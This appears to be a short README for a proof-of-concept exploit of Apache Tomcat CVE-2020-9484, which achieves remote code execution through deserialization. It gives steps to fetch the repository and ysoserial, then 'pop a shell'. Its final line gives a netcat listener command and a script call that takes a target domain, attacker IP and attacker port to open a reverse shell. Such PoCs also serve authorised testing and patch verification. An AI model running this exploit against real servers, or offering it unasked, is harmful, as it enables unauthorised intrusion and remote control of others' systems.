POC for CVE-2020-9484
Apache Tomcat RCE by deserialization (CVE-2020-9484)
Explore the docs »
1. Clone this repository, then you will be able to use CVE-2020-9484 and modify the source code if needed.
2. Download ysoserial jar
3. place both CVE-2020-9484 and ysoserial.jar in the same directory
4. pop a shell!
A simple bash script has been written in order to streamline the usage of CVE-2020-9484.
Upon Exploitation you will need to have a netcat listener ready
nc -lvnp $port./CVE-2020-9484.sh domain attacker-ip attacker-port